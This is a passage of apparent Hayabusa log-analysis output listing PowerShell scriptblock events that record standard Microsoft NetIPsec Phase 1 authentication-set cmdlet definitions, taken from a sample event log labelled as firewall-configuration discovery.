[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
